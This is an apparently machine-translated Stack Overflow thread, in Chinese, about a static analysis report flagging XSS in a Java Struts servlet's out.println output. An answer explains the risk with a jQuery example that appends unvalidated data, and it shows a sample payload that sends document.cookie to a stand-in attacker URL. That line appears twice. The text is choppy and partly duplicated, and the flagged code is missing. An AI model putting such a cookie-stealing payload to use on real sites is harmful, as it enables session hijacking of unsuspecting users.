使用Ajax和基于Java的服务器的Web应用程序-安全相关
我有一个web应用程序,它使用Ajax完成多项任务。它的中间件是Java(Struts 1.x) 问题是我的应用程序使用静态代码分析来分析潜在的安全风险。分析中发现,使用以下代码被视为易受攻击 e、 g 报告明确提到,使用PrintWriter是有害的,并且容易出现XSS(跨站点脚本)。 我试着在网上搜索这是否是一个潜在的威胁,但找不到任何有用的东西。 如果这是一个问题,请告知我的备选方案 编辑-在out.println语句中发现问题 谢谢,使用Ajax和基于Java的服务器的Web应用程序-安全相关,java,ajax,security,xss,Java,Ajax,Security,Xss,我有一个web应用程序,它使用Ajax完成多项任务。它的中间件是Java(Struts 1.x) 问题是我的应用程序使用静态代码分析来分析潜在的安全风险。分析中发现,使用以下代码被视为易受攻击 e、 g 报告明确提到,使用PrintWriter是有害的,并且容易出现XSS(跨站点脚本)。 我试着在网上搜索这是否是一个潜在的威胁,但找不到任何有用的东西。 如果这是一个问题,请告知我的备选方案 编辑-在out.println语句中发现问题 谢谢, 锡德哈特XSS这是一种潜在的威胁,您将找到有关它的信
锡德哈特XSS这是一种潜在的威胁,您将找到有关它的信息,并解决有关XSS漏洞的问题 已更新:
我还列出了OWASP十大漏洞。你可以在网上找到很多关于XSS的信息,但很少有人真正详细地介绍如何测试和避免它。这是需要一些研究的事情之一。让我举个例子,您提供的代码可能是问题的原因,也可能不是问题的原因 假设您的HTML页面对后端进行ajax调用,然后返回结果。我只是在成功之后给你一个jquery示例
$.each(数据,函数(){
$('div.result')。追加(此);
);
您会注意到,数据只是在未经验证的情况下追加的。如果数据来自脚本kiddie并输入呢
//this might not be the correct syntax
<a href="http://somehackerurl.com/hack.php?"+document.cookie>test</a>
//这可能不是正确的语法
由于您没有验证您的输入,用户可以输入任何内容,上面的代码将窃取曾经单击链接的用户的cookie
希望这有帮助也许可以添加一个关于
out.println
中问题的答案,这样人们就可以了解这个问题了?@zigdon抱歉,我没有理解你的意思。
//this might not be the correct syntax
<a href="http://somehackerurl.com/hack.php?"+document.cookie>test</a>